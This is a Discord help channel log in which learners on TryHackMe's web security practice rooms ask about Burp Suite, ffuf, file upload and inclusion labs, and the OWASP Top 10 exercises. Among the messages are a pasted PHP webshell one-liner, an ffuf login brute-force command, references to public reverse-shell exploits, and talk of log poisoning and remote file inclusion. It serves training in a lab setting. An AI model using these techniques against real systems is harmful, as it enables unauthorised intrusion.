#web-fundamentals-path

i can't pin point why my burpsuite settings are returning errors on the basic of burp suite room. Im in the task 7+ range and despite closing my attack box and starting new and repeating the steps i still get routing errors when trying to load my target machines IP in the burp browser..

can anyone point me in the direction of something thats changed is it something that is outdated in the text steps that I might of overlooked?

currently on task 11 i keep getting "error no route to host" on the burp browser

Do you have intercept on?

i did yes

and then i forward and I also tried it with it off as well just to see what the page would load @restive hemlock

You might need to press forward a few times.

Are you on the Attackbox, or VPN?

attack box

after i hit forward once the button wont allow another click if thats helpful at all info wise

Can you send a screenshot?

for sure of the error page or anything in particular ?

Full Attackbox. 😄

on laptop so not many windows up at once but anything ya need ill send

at intercept

after forward

what is 10.10.33.186 ?

the target attack machine

Which room are you doing?

task 11

also a previous task question was not correct as MISC is no longer in the version being deployed in the attack box. i caved and looked up that answer.. if thats helpful to not i see your a room tester so wanted to pass that a long as well i can capture that as well if you like

task 7

Those sort of things would need to be posted in #room-bugs

will do

I'm a room tester, which is a volunteer role, I'm not part of the moderation team in Discord, nor am I part of the staff team of TryHackMe.

understood thanks for forwarding me the correct room to post in .. still lots to learn your help is very welcome

Anytime.

should i shut down the machines and try starting over?? i caved on this part as well and checked out a video clip .. i really want to do this unguided as thats how i learn personally the best.. but in this case I saw the person get to that step and what his site looked like and well thats why i came here to see what I am missing

I've loaded up a machine, I'm going to try and do it.

rgr that

Your website doesn't open for me, I suggest terminating the VM, and re-trying.

thanks ill term now

get back to you in 2 min or so im assuming give it its usual spin up time etc

thank you i can continue. for what its worth i tried that once figured i missed something else on burp .. etc
much appreciated

🙂 Happy hacking.

HELP cant get code for juice shop Task 3 Question 1
I think it might be a bug but want to make sure
https://youtu.be/G_OMkzMJ-wM

hello

can I get started in bug bounty by completing web fundamentals path?

What others paths should I complete to get a good grasp in bug bounty?

i think the junior pentester would be a great one too

make them all

Hello, the JuiceShop is not giving the flag codes for some of the tasks, just FYI. I was successful and nothing popped up on multiple tries so I had to unfortunately go and find them on google lol.
To be more exact, the whole "Where did that come from?" section.

Task 19 - What is the SHA-256 hash of https://code.jquery.com/jquery-1.12.4.min.js? The reference answer is outdated. Hence it does not accep the actual hash. Should be updated

May I ask which room is this?

Hello! (first time posting) im having issues with the NMAP room, im stuck on the question "
Which RFC defines the appropriate behaviour for the TCP protocol?" on task 5, i know the answer, even found a video and the answer is 3 star then 3 star but mine is " 3 star then 4 star" (not sure that will show up but mine has an extra star in the answer compared to the video) any help is appreciated! 🙂

Hey guys I am looking for some assistance, please refer the attached screenshot for example. Say I've identified an LFI here & am able to read the /etc/passwd . What should be the right approach for getting an RCE ?
I was thinking about poisioning either of the logs FTP/SSH ssh PHP_Backdoor_code@IP and then navigatign to the auth.log file from the website itself which will make the webpage execute the codebut I believe the access would be limited to read the file same thing for the FTP as well which may or may not be readabel. My question is primarily about how to know if I am accessing the right file path through the browser ?

Appreciate all feedbacks!

if there are dedicate rooms around log poisoning please do le tm eknow

Typically you'd poison the webserver logs with user agent or similar

And there's one, but I'm not sure if it's still available. An LFI room

Thanks for responding. So how do we actually navigate to the right file is what I a also trying to understand.

Gave +1 Rep to @orchid hazel

I don't know what you mean by navigate as you don't have a file browser

But you know, if you put like 10 ../ then you'll almost certainly hit /

Yeah, that's what I was trying to say

i am trying to get the response from this request for upload js

but its give me respose of not modified

i have removed the js part from here

aah so it was cache problem

I'm still learning but I think FFUF and DNSRecon are different tools.

I see FFUF like to use "wildcards"

while with dns recon you can "identify" the DNS of a domain.

https://www.kali.org/tools/dnsrecon/

This is from the docs -> Enumerate General DNS Records for a given Domain (MX, SOA, NS, A, AAAA, SPF and TXT).

dnsrecon -d microsoft.com

ah yeah, but I think its not quite the same because the example here was when the dnsrecon was used to bruteforce, the command '-t brt' if i recall correctly, as opposed to your example, since just using the -d command isn't really bruteforcing it

i was mainly confused because during the scenario i mentioned, it seemed like the same purpose of bruteforcing was attempted using two different tools.

but i realise now

that the dnsrecon used in this scenario was determining the subdomain by checking random subdomain names from a predetermined wordlist against a DNS server , as opposed to ffuf which is using a user defined wordlist (as opposed to dnsrecon predetermined one), and is testing them through the HTTP protocol

Assuming I haven't grossly misunderstood it from my current perspective

lmao

I think i understand now actually, fundamentally the ffuf was just trying to find valid web addresses by testing different HTTP get requests using different subdomain names, so it was just testing different links, based off the subdomains in the user specified wordlist.

Whereas the dns recon was just testing different domain names and seeing if they matched with the certain domain name stored in the DNS server (which corresponded to a certain IP address)

HTTP vs DNS. Lol

That last line is the key IMO
You might want to look into something called vhosting, which is how you can have multiple sites on the same port+IP address and the same webserver

Vhosting being short for virtual hosting

Thanks for that suggestion, I will check it out.

Hi everyone, I am working on OWASP Top 10, Task 28: [Severity 9] Components With Known Vulnerabilities - Exploit. I got to the part where I ran python3 47837.py and got the result Usage: cve2019-16278.py <Target_IP> <Target_Port> <Command>. I tried running python3 47837.py 10.10.53.120 80 id and this gave me error Traceback (most recent call last): File "/root/Downloads/47837.py", line 67, in <module> cve(target, port, cmd) File "/root/Downloads/47837.py", line 54, in cve soc.send(payload) TypeError: a bytes-like object is required, not 'str' I am googling around to figure it out, but also maybe somebody has a hint?

is that the bookstore one?

it's nostromo web server

uhm weird, my owasp top 10 has only 23 tasks Oo

oh nvm, they made changes, found it.

did you try to start it with just python exploit.py ? might be just a version thing

ah ok, i got that already. i thought there is a step more. in the example/instructions they also showed actually running an IP, port and command. in one of the last screenshots. so i thought i should do it with an IP of the Kali machine 🙂

for some reason, i am stuck in task **Task 8 Bypassing Server-Side Filtering: File Extensions **
no matter what extension i give, the website seem to be accepting only .txt it literally rejected a simple .jpg
and i tried numerous extensions to by pass the filtering like .jpg.php .jpg.php5 .txt.php5 .phar .ph5
but it keeps saying "File must be chosen before being uploaded. Type "help" for syntax"

somebody help

Which module @whole breach ?

One of those extensions can actually bypass the filter. If you're still getting this error reboot the machine and try again.

Upload Vulnerabilities

yeah i got the flag 🙌

I have aquestion regarding Burp-Suite.

What browser do you use with Burp-Suite?

Is it the Burp Browser or any of the external ones and why?

burps built in browser or firefox profile with foxyproxy

Burps's chronium browser will be detected by some signatures,
so if I get blocked during pt I will switch to firefox + Proxy SwitchyOmega

If u get ''Blocked during pt'' What is PT and where do i see if i getblocked?

And thanks btw!

like blank pages or 403 error codes

pt = penetration testing

Interesting

Thank you.

As I have kinda set up my own firefox-burpsuite setup as we speak; I wonder.. Why not just use the proxy settings of the Mozilla Firefox itself instead of use an additional program(the switchyomega)?

Because plugins will make things easier, for example:
You are viewing the site target.thm with burp proxy enabled, but then you want to visit google which have HSTS enabled so the proxy can't handle it,
To solve this problem, you can specify to enable burp proxy only on the target.thm site,
then you can visit google normally

That indeed easens things.

To tackle this issue I use Firefox + built-in proxy and Edge for research etc etc.

For now...

Now let's get to cracking! Wth is burp-suite anyway. I dont think i'll get the hang of it in one day haha

Intercept can apparently stop my browser from accessing the page and gives me oppertunity to change somethings somehow.. interesting

hello

anyone here?

im doing the jewel but for some reason i canont get the /assets/js/upload.js .. path to cach i burp

anyone has any idea why?

nvm solved 😄

I need help. I have been connecting with openvpn but when I'm trying to open a ACMI site with my virtual ip address the page is still loading

how can I solve this problem?

connection time out

Hey guys 👋
I'm going over the Web Fundamentals room - Introduction to Web Hacking - Authentication Bypass (Task 3: Brute Force)
Link: https://tryhackme.com/room/authenticationbypass

I have a question regarding the command used. Why are we using -fc 200 ? This will filter out all the HTTP responses with the status code of 200 (OK) right? aren't we interested in those ones (successful loign with the username and password) and instead should be using -mc 200 ? But the command with -fs 200 is returning the right result so I'm getting confused here. I tried to understand the difference and read the man page of ffuf, still thinking this is the opposite to what I understand.

Appreciate any clarification. Thanks!!

Hi,

When using burpsuite, proxy for intercept via browser, it keeps giving errors.

About sandbox, OS doesnt support this. When i follow the steps to change this, the burp browser still does not work. Any suggestions?

Hey

Hello

Hey guys I started the Authentication Bypass but i find it sooo hard especially the curl part can anyone help

If you're a free account you might not be able to curl, unless you have a VM.

no i m not a free account the problem is i have no clue what is that for i understand that curl i for communicating from and to the webserver

If you follow along, it will work

i guess i am the only one hhahaha sorry bro and thanks for help

If you're completly stuck, there is a video by John Hammond.

@restive hemlock can i have a link please

Sorry, I'm looking at a different room

I'll load on up, it's been awhile.

@restive hemlock feel free bro

Did you create an account?

@restive hemlock what do you mean in tryhackme ?

No, on the room

no i haven't i guess

You need to, so you can send the requests.

How i can create it i m new to discord sorry

In there for the room

ahh yeah i did bro sorry for the confusing , i got quiz right but the syntax and how it works i couldn't understand it

hey guys

have anyone came trough the file inclusion challenge i ve seen people doing th first task with burp , it doesn't make sense we didn't learn burp before

can someone help me pls?

when i inspect the page

in idor room

I've answered you in another channel.

hmmm, in the sql injection room > Task 5, the flag should appear in the pop-up after answering martin's password question?

yeah

ok, so the popup appears and immediately disappears to load the second page for me 🙂

Oaft, I dunno how to help that one, do you use a recorder?

yes, I thought about it, it was just to bring up the info 😉

That's your mistake, using that mess.

hi guys, i need some help with the challenge of "SQLMAP"

unfortunately only with the chat (my level of English is very low)

Hey guys. I'm currently stuck on Task 15 on the OWASP 10 10 room. I managed to find an RCE exploit that gets a reverse shell back to my machine, but I can't seem to get it to connect to my machine. At first I thought it was because I was running my kali in a VM, so I tried using the same exploit in the Attackbox on THM and it still doesn't connect. Any ideas on what it could be?

For context, the tasks asks me to get the content of /opt/flag.txt so I thought the best way to do that would be a reverse shell, but I just can't seem to get the reverse shell to connect to my machine no matter what I do

I looked at the code of the exploit and it doesn't require anything specific aside from the URL, an lhost and lport

I've been stuck on this way longer than I want to admit..

Which Owasp top 10 room?7

Old or new?

It's OWASP 2021 @restive hemlock

I'm going to boot it up, I already think I know which one it is.

Yup, bookstore.

I found two exploits and neither seem to be working. I'm gonna feel real dumb if it turns out to be something simple lol

Can you tell me if I missed something?

I think you did, can you tell me what you tried, and screenshots please?

And link me the exploits you used,

So far I've tried https://github.com/jayngng/cse_bookstorev1 and https://www.exploit-db.com/exploits/47887

I can get a shell to upload on the first one, but it doesn't connect, whether it's in my kali VM or the attackbox

Correct exploit. 🙂

Can you show me in a screenshot?

..

I tried in both my kali VM, and the attackbox

Why are you trying two different ports?

Both 85 (which is wrong)

and 4444

Wait

I thought port 85 was where the webapp was hosted

and 4444 is my local port

The task tells you it's port 84...

Local port won't be needed either.

Running it without specifying a local port triggers a TypeError

Strange.

https://www.exploit-db.com/raw/47887

Copy that, create a new file on your kali (make sure you save it as .py

I tried that one too

Can you try that again?

And show a screenshot?

Buuut I was using the wrong port...

Try use the right one this time 😛

It uploads but can't execute commands apparently

Screenshot?

I tried looking at the code, and I'm not sure if I understand the payload exactly

Remove the /index

Just have the URL and port.

Thanks man lmao

😄

It's always the simple things!

Much appreciated!

No problem!

I was stuck on that for like a whole day

Hello everyone. Has anyone tried webshell in file upload vulnerabilities #Task5 - Remote Code Execution? Most of the walkthrough show use of reverse shell. I tried with the given php payload but it does not work.

It gives a 500 error if I access that page - http://shell.uploadvulns.thm/resources/webshell.php?cmd=id

Can you send a screenshot please? We won't be able to access it as you might have added an entry in the /etc/hosts file for the domain.

What php payload are you using? The command you are executing is 'id' and it doesn't seem to be a reverse shell.

Sry I tried earlier but I do not see an option to upload a screenshot/file.

I uploaded a php webshell file to /resources path. And then used above mentioned url to test the file.

The code I uploaded in the webshell.php file is

<?php
    echo system($_GET["cmd"]);
?>

I uploaded another image file and I am able to access that but this file gives 500 error

!docs verify

@nocturne yarrow you need to verify your account to be able to post screenshots

Have you tried to upload a php reverse shell (and changing the file extension to bypass the restriction) instead?

Thank you I will check this

Gave +1 Rep to @short wave

So im in the How websites work room and im not sure if i did something wrong or not, but the dog image is not showing up

<!DOCTYPE html>
<html>
    <head>
        <title>TryHackMe HTML Editor</title>
    </head>
    <body>
        <h1>Cat Website!</h1>
        <p>See images of all my cats!</p>        
        <img src='img/cat-1.jpg'>
        <img src='img/cat-2.jpg'>
        <img scr='img/dog-1.png'>
    </body>
</html>

It's src, not scr

ah so im just dumb thanks

It happens

Hey there 👋

I've question

I was logging in to my cpanel with valid credentials. But a few minutes later I am longer able to gain access. It just says invalid creds. So my IP addr is blocked?

Which room are you working on?

Im talkin bout my own website bro

Hi, I am trying to complete the OWASP juice shop exercises, but I am not able to get the flags even the solution seems to be working. To be precise, in the case of where did that come from (DOM XSS), I can see the XSS popping up, but I do not get any flag. I cleared the browser cache, I terminated the machines again and again, I switched to chrome, but no success. And now I am stuck, could you anybody help me this issue? Thanks.

@rare relic did you find the score board? Look there after the specific "succes-entry" and click on the green switch on the right side. then the flag should be displayed again. I had the same problem, however, only with one flag.

Thanks for your quick response. But I am not able to locate any scoreboard, could you elaborate?

Gave +1 Rep to @karmic dew

problem solved, thanks a lot. Although, I did not find the scoeboard, I just re-ran everything, and instead of typing the command, I copied it from THM, and it worked, still not sure why! :--)

Gave +1 Rep to @karmic dew

@rare relic Very nice.
Just started the VM. The above mentioned page is available and you should definitely take a look, if you accidentally clicked away one of the other flags 🙂

So far I got all the flags, but I was only stuck with the DOM XSS, but by scoreboard, if you mean the green pop-up, then yes, I can see that, otherwise, nada. Your brother is new to this whole thing :--)

@rare relic it's no popup, it's a webpage Finding the page also gives a flag. But you don't need the flag for this room, as far as i can remember.

you are right, but now I checked the THM material, and I have to still finish the XSS exercises, and then the last one is about the scoreboard. Cheers mate :--)

why I can't load image

and I add domain in /etc/hosts but use firfox can't load web

I'm in china,I use the vpn on the kali

I use the curl can view source,but web can't, does anyone konw why?

I tried to remove user-agent successfully using browser access

firefox will ask you if you want to visit the domain on the top, if you ignore it then it wont work

Hi, I am new to this course and I got litte stuck.

How can I find where is the directory listing flag in a web? I don't know what to use.

Your favourite browser directory brute forcer.

100% 🙂

"Upload Vulnerabilities" Challenge was a bit "hard"

had to restart the server sometimes , so if a function does not work , restart may help

Can you be more spesific? As I am new so I actually did not understand what you ment 🙂

ffuf, gobuster etc.

oh thanks 🙂 I will make som research about how to use them

DubZz and ScrubZ. This could be a WWF tag-team.™️

Only of our costume resembles either the Legion of Doom, or the Bush wackers

Hello, I'm in the room: Upload Vulnerabilities
(https://tryhackme.com/room/uploadvulns)
task 9: Bypassing Server-Side Filtering: Magic Numbers
and I had a recurring problem when trying to upload the shell.php file

After adding the magic numbers modification, I can't upload the file, even though the file is displayed as a GIF in the shell.php file

Hi, is there any way to exploit jquery v1.7.1

hey

i was doing content discovery module and after waiting for 2 mins and turning the machine when i click on link its showing that site is taking too long to respond and its not working , what should i do, 4-5 times i turned off the machine and again restart the machine then waited for 2 mins but after these steps also nthg happing same thing showing again and again that site is taking too long to respond, i have a great band width still nothg happing

Are you using your own box or the attackbox? There are occasional issues when using your own VM. Try to spin up with the attackbox and see if that works.

has anyone gotten through the upload vulns room recedntly? I cannot get any file to upload on the server side filter extension by pass.
I just get stuck at a loop where its saying a file must chosen before being uploaded.

its not working on attackbox too bro

it show connection error

everywhere

personal vm or attackboxx

What's not working exactly?

hello, so im doing a task on network secuity 2 and im working on my own kali linux vm, but everytime i try to run this command " cd /tmp/mount/cappucino" it always gets stuck at cd /tmp/moun and i cant type anymore...anyone can help with this issue? thanks

can you send me the link of the room

If you are in rev shell have you tried to stabilize your shell

It's not a reverse shell...

https://www.linuxquestions.org/questions/linux-networking-3/mount-hangs-forever-with-no-error-messages-4175622450/#:~:text=It may be your system,have any messages about attempts.

Post some screenshots of the errors you are receiving. Will be easier to narrow down your issue.

i am nt able to put screen shot

the sites given in modules

i am not able to connect on that

from linux from attackbox

hello

anyone here to help ?

hey guys

anyone online

i am having issues in ffuf

stat /usr/share/wordlists/SecLists/Usernames/Names/names.txt: no such file or directory
this is the error

Error seems to be pretty straightforward? Did you check if the file you are looking for is even in that path ?

i got it sir

L in seclists, i wrote it wrong

thankyou

I'm doing content discovery module from the Web Fundamentals path but I got stuck at task 2. I cannot connect to robots.txt file even though I'm using the correct machine IP. I'm connected using Attackbox but when I post URL in firefox I got this msg "Unable to connect". I searched in discord for previous simialr quires but cannot find solution to mine. Any suggestions?

Hi everyone (upload vulnerabilities room challenge), when accessing via modules ../content/XXX.jpg I get a 504 error and no shell, although I uploaded a java webshell script and located the file. What could be wrong?

There's a connection (one single) to Netcat, but the shell doesn't appear. I tried make the shell an executable (?) this doesn't change anything.

Shell must be broken, but...? No idea...

Try http instead of https

I haven't worked with a java webshell that much, but have you tried a reverse shell one? Also, have you checked which OS the target is running?

Thanks for replying! Sorry for explaining badly. It was a reverse shell, I got a signal from it (it did “call home”), but not more than that. It was a NodeJS script from the swisskyrepo on github.

It worked thanks

Gave +1 Rep to @short wave

Did you guys enjoy this path? I’m finishing SOC 1 and thinking of doing this next

Hi there,

Someone can explain to me with it is -fc 200 in the ffuf request and noy -mc 200 ?

We are searching a match between the username and the password so why-fc 200 parameter ?

Thanks !

-fc 200 is looking for a "200 OK" request, which means it was successful.

But read the explanation text below "... status other than 200"

And in the documentation it is explained that -fc is to filter out and -mc is to match.

So in this room the expected result is another result than 200 it means that if the request match we will be redirect throw another page it means that we are waiting for 300/301 status code ! Enjoy 🥳🥳

Rq:
-fc : filter out
-mc : match

Careful sir -fc is filter out so not looking for a 200 status code

tryhackme tricked me. in burp suite room i went to admin.tryhackme.com and got rickrolled!!!

Looool.

that's actually so funny lmfao

There are other boxes that gives you similar surprises so there isn't a lack of it. 🤣

whenever i use ffuf tool to fuzz i got blocked by website. How can i bypass it??

Which website?

If it is a publically facing website, there are security measures against scans like that.

Hello

In Burp Suite Other Modules Room https://tryhackme.com/room/burpsuiteom
I can't seem to get the link to load properly. http://<IP>/support/login I've tried with intercept both on and off, but only received an error message below. What am I going wrong here?

Are you on the Attackbox or VPN?

Also, did you mean to block out the IP in the failure line?

I'm using VMware without a VPN on this room. Yeah just blocked out the IP, since I closed out of the box.

Ok, I was just wondering because you blocked out the IP in the line, but you left it in the address bar.

ahh well I grabbed a quick screenshot before closing it out.

I have a meeting in 5mins, so if I don't pop back in. It's cuz of that. Thanks for the help by the way.

You should be able to access the ip, not right away, sometimes it's 5-10 mins

Good to know I'm impatient lol thanks Scrubs

It wasn't the deployment time. It was that the working link is https://10-10-29-76.p.thmlabs.com/support/login/ instead of http://10.10.29.76/support/login what's listed in the room. That should be a quick fix, but others are going to run into the same problem.

Both links will work.

The p.thmlabs don't need on the vpn to access.

wouldn't work for me. strange

https://tenor.com/view/hello-gif-25645320

I was able to get into the shell, but how do I navigate to /opts/flag.txt?

Directory traversal.

i feel stupid, but i was trying to traverse the directory using cd, but i can't get anywhere

i figured it out

nvm

i used cat /opt/flag.txt

i wonder why using CSE Bookstore 1.0 - Authentication Bypass or the other two didn't work?

Cse bookstore 1.0 should have worked.

What was your syntax?

hi, i'm on the "Upload Vulnerabilites" room on the task 8, when i'm try to upload a file i get an error 500. I'm not sure if it's normal

just reload the machine seem to be working, my bad

4 Learning Paths Done! ✅

6 more to go! 🥵 Next path: SOC Level 1

Ran into the same problem using the CSE Bookstore 1.0 - Auth Bypass.
python3 48960.py http://10.10.225.180:84 and I received a syntax error.

So weird, I'm getting this error. I didn't modify the file in anyway.

Maybe it's the wrong exploit

https://www.exploit-db.com/exploits/47887

That's what it was. That's what I get when following someone's write up and not reading all the way through.

thanks Scrubz

https://tryhackme.com/room/subdomainenumeration Task 6 Virtual Hosts. I don't really understand this:

user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP
The above command uses the -w switch to specify the wordlist we are going to use. The -H switch adds/edits a header (in this instance, the Host header), we have the FUZZ keyword in the space where a subdomain would normally go, and this is where we will try all the options from the wordlist.

Because the above command will always produce a valid result, we need to filter the output. We can do this by using the page size result with the -fs switch. Edit the below command replacing {size} with the most occurring size value from the previous result and try it on the AttackBox.
user@machine$ ffuf -w /usr/share/wordlists/SecLists/Discovery/DNS/namelist.txt -H "Host: FUZZ.acmeitsupport.thm" -u http://MACHINE_IP -fs {size}

"Because the above command will always produce a valid result" what do you mean by that?

Did you start the machine?

Have you tried sending the request using the command provided?

Doing so will provide a status code of 200, even if the subdomain name you provide is invalid as it will only redirect to acmeitsupport.thm. That's how I understood it. You can also do the TakeOver room (https://tryhackme.com/room/takeover) to reinforce the concepts though I haven't finished it myself. I'm only at the point where I identified the subdomains.

Ok, now I get it. Thank you 🙂

Eventually I finished this task, I just didnt understand that point. I always start the machine and the AttackBox, I dont see another way to learn.

I have a question on LFI challenges

Just ask away and someone will answer it, haven't done the LFI challenges myself though.

task #8 of File Inclusion, on flag3 I fired a local http server using python http.server module and served a php file to read the flag from /etc/flag3 then I used curl with POST method to send a variable file=point_to_my_local_http, I was using the VPN. But I feel I cheat it. Is there any other way? already completed the room but I'm curious since the hint mention to review $_REQUEST on PHP to see what's not filtered.

I made the file with no extension since the server is always adding .php at the end

and of course, name my file .php

i find myself to be really bad at web application penetration testing but good at network pen testing . is that normal ? i passed the network security modules easily as i have a better Technical background in networking in general. also i am starting to feel kinda web app hacking boring lol. does anyone feel the same way ? can someone help ?

Going live at 8pm PST on https://twitch.tv/0xgsat
Completing Web Application Security Path > Content Discovery

Hello, I have a problem with the room "
Upload Vulnerabilities »
I do not understand very well the manipulation to do so
I can't access the website "overwrite.uploadvulns.thm"
Thanks for your help 🙂

Have you added the required entry in your /etc/hosts file?

I tried but I must be doing it wrong :/
I tried several things

" sudo nano /ect/hosts " but it tells me that there is no direction for /ect

"vim /ect/hosts"
but it still doesn't work when I want to go to the website

the path is "/etc/hosts"

you are tpying "ect"

sudo nano /etc/hosts

@static ginkgo

my god

thx

"What does Sequenzer allow us to evaluate?" What is this answer??? I cannot find

What room are you working on please?

okay i found it

how do i get to this window? used to mac ( sorry )

That's Remmina.

remmina?

what do yo you mean?

https://remmina.org/how-to-install-remmina/#debian

Its a remote desktop application with UI in Linux based OSs

i m at introduction to window why do i have to install remmina ?

i don t understand how to get to this window

Because remmina is better than xfreeddp

I'm having so much fun with this so far. Just finished Local File Inclusion. It took me a while to fully grasp it but I'm very proud that i was able to figure it out on my own

I'm running into this same issue. Any help? sha256sum after a wget isn't getting me the answer

@uncut cove click the + button top left

Struggling with the brutefroce with ffuf. I made the valid username text file and ran the command but it doesnt give a user or password. also doesnt give errors

Can you share the entire command?

ffuf -w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.150.143/customers/login -fc 200

I don't see anything wrong with the command. Can you share a screenshot of the screen after running the command?

!docs verify

this is the command from my notes @boreal jasper "ffuf-w valid_usernames.txt:W1,/usr/share/wordlists/SecLists/Passwords/Common-Credentials/10-million-password-list-top-100.txt:W:2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://10.10.94.46/customers/login -fc" i cant spot a diffrence but worked for me

i just compaired them in a text compairer and there exacly the same so it might br a THM problem

are you letting ffuf run the whole operation or are you stopping it early? because from memory the results apear near the end of the wordlist

correct me if im wrong

i let it run the entire time. I just moved on with other stuff. I went back and typed the command in like normal and it worked. Maybe at the time it was bugged?

yeh maybe the webserver did not boot properly, glad you worked it out 🙂

@proper moat Do you still need help with your question? Or did you figure it out? I had the same issue as you, but I managed to get it to work

IN this room, under intro to web hacking, content discovery is completed completely but it still does not show green checkmark...I don't know whts pending..

Good-Morning People!
Have a nice hacking day 🙂

LOL I don't believe if this is possible?? 101% Completed........

What's wrong here??? It does not give me a Green CheckMark on completino.

Maybe one of the tasks is repeated.

But I am not getting green checkmark for completion of it...

How do I start

anyone good with PHP? I have no experience whatsoever and having a hard time with the first question on task 2 in Command Injection
EDIT: NVM: I was looking at the wrong code snippet it was referring to

it was someone else asking the question i belive it was @boreal jasper

thank you tho and i also dont think the problem was solved

Hey pals
I'm new here
I do I go on this long journey 🤤

Glad to have you aboard, welcome!

Yeah
Thanks

Okay, I'm stumped and it's probably something stupid simple, but looking up it seems others had the same issue.

Authentication Bypass, https://tryhackme.com/room/authenticationbypass, Task 3 "Brute Force".

Command being issued:
root@ip-[REDACTED]:/usr/share/wordlists/SecLists/Passwords/Common-Credentials# ffuf -w valid_usernames.txt:W1,10-million-password-list-top-100.txt:W2 -X POST -d "username=W1&password=W2" -H "Content-Type: application/x-www-form-urlencoded" -u http://[REDACTED]/customers/login -fc 200

Response:
` :: Method : POST
:: URL : http://[REDACTED]/customers/login
:: Wordlist : W1: valid_usernames.txt
:: Wordlist : W2: 10-million-password-list-top-100.txt
:: Header : Content-Type: application/x-www-form-urlencoded
:: Data : username=W1&password=W2
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200,204,301,302,307,401,403,405
:: Filter : Response status: 200

:: Progress: [100/100] :: Job [1/1] :: 0 req/sec :: Duration: [0:00:00] :: Errors: 0 ::`

valid_usernames.txt is formatted as followed, and yes I placed it in the same folder together:

0day
dolphin
Jake
Skidy

✅ Using attackbox
✅ Skimmed thru ffuf github
✅ Reviewed the room a few times
✅ Terminated and launched the server again
✅ Tried outputting into a file nothing useful

What am I missing?

facing issue cant accses [ Server not Fond ]
room : uploadvulns > Task 8

annex.uploadvulns.thm
magic.uploadvulns.thm
jewel.uploadvulns.thm

first 3 was fine for me overwrite , shell , java so thats mean my hosts file are ok whats issue here ?

• i had to restart the machine multiple times to make reversesheel upload work its was a bit laggy (not responding)

thoes usernames are not correct. not sure from where you did get them

I just changed them, so I don't give anything away.

oh

are you running the terminal in same directory as usernames ?

the valid_usernames.txt and password file must be in same folder from where you running the command

Correct, I have the terminal open in the folder they are both in /root/Tools/wordlists/SecLists/Passwords/Common-Credentials/

yes + that or just add directory of the passwords after W1,/usr/......

i remember i got stuck there too all i did just moved the usernames to a folder without root privileges can accses it and i specified in my cmd where my passoword list is , just add password directory after

ffuf -w valid_usernames.txt:W1,[ur passwordlist dir]:W2 -x  .....

Thank you, that worked!

Gave +1 Rep to @hard stump

np Gl with ur path

This path is really good for learning web exploits, very bad for what hair I have left.

Hello, how can I secure my website from file inclusion attacks?

Hey all, i try to finish this part 4 decoder hashing on the burp part and i dont undestand where i failed with the décoder, i know the response so i try to encode etc with the hint and i dont have the same result of the ssh key

I finished this a while ago and didn't take very good notes but I remember this one being a real pain. I remember having to decode the the initial key into HEX and then into MD5. I had to be really careful how about cutting and pasting because even one extra space at the end of the key changes the hash completely.

Has anyone found the right exploit for OWASP Top10-2021 Task 15 (Vulnerable and Outdated Components - Lab)? I might have to skip this and come back to it with fresh eyes.

I just completed that room the other day. Review task 14 and use the resource it shares for task 15. What stumped me was identifying the platform but it's in plain sight which then leads you to use other things the room has taught you as well.

I figured that I was simply using the wrong keywords when I searched Exploit-DB. I couln't quite pin it down.

Is burp suite browser really that slow im on room file inclusion?

If it is being too slow for you, firefox and foxy proxy is also an option. I have never used the burp browser so I couldn't tell you if it normally slow or not though.

I am also currently trying the owasp top 10 room and task 15 confuses me a lot. task 14 mentions a python script but when I look through exploit database and search for bookstory I only find 4 entries one of them being authentication bypass which is not a python program but a simple text file. The informations work and I could enter as an admin but that doesnt help me finding the flag. Even after googling I found a walkthrough that leads to the text file then suddenly talks about a python script. I am very confused is it possible that this room wasnt updated properly?

The room is perfectly fine and accurate. Why are you searching for "bookstory" on exploitdb? Task 14 clearly tells you to search for "||Nostromo 1.9.6||" and upon doing so a python script is found just like the task says.

I looked for book store for task 15. I am still a little confused but I found the flag now

i found it helpful watching an hour video before attempting it alone

since he expanding on some of the topic and made it easier to understnad the "why" behind it

you can lookup "TryHackMe - OWASP Top 10 (2021) - Live Walkthrough" if you are inteasted @quick pelican

Anyone knows if there is a problem in UploadVulnerabilities TASK11(Challenge) with Burp Suite ? I wasnt able to capture the upload of the bad file i was trying to. It seems like it completely ignored although i could capture a legit file upload...

Hi Everyone, Just doing this room from last month, i was in file inclusion room, i thought i need to have document my work via blogs, can i use the room's screenshots in my blog , is that legal or illegal?

I don't think it is illegal as there are already several writeups on various TryHackMe rooms published over the Internet.

Yeah that's right, just for clarification, thanks ✌️

Just did it, it's working my side

Today I finished the SQL Injection room and I've a question about task 10: remediation.
There is the following advice:
Prepared Statements (With Parameterized Queries):

In a prepared query, the first thing a developer writes is the SQL query and then any user inputs are added as a parameter afterwards. Writing prepared statements ensures that the SQL code structure doesn't change and the database can distinguish between the query and the data. As a benefit, it also makes your code look a lot cleaner and easier to read.

=====
Can someone give me simple example who such a SQL code would look like (bad/good one).
Thanks

Sure (:

An SQL code in php looks like (without prepare):

if(!empty($_GET['id'])){
$result = $odb->query("SELECT * FROM `products` where `id`=" . $_GET['id']);
$product = $result->fetch();
} else{
    die('No product is given.');
}

This code is vulnerable to SQLi as the GET parameter isn't sanitized.

A safe SQL Code should be like (with prepare):

$SQL = $odb -> prepare("SELECT * FROM `users` WHERE `username` = :username");
$SQL -> execute(array(':username' => $username));
$userInfo = $SQL -> fetch();

By using prepared statements, you ensure that user input is treated as data, not executable code, which helps prevent SQL injection attacks.

Thank you!

Which "attack server" do I use for the RFI attack (File Inclusion) ?

In playround.php

Your own, like a simple python server is already sufficient 🙂

Thanks. That worked

Gave +1 Rep to @misty shadow

@rare relic

I have completed introduction to cyber security and pre security and web fundamental paths in thm
And now I need to test myself and I put all things i learn into action
Any suggestions which room or Practice series i should complete to achieve my goal

You should try to do some easy rated boxes in THM.

Ok

Question: Is the burp suite module on the Attackbox still on par for completion of the Burp Suite module. Its for the second time when I try to do tasks that an option is not available. In this case I try to do within Other Modules, task 8, which is Sequencer Live Capture, and for me the Cookie and From field are gray out after I have sent capture the request and sent it to the sequencer.

I'm doing Web Fundamentals path and need help in Task 10 (Site Map & Issue Definitions) of Room Burp Suite (The Basics).
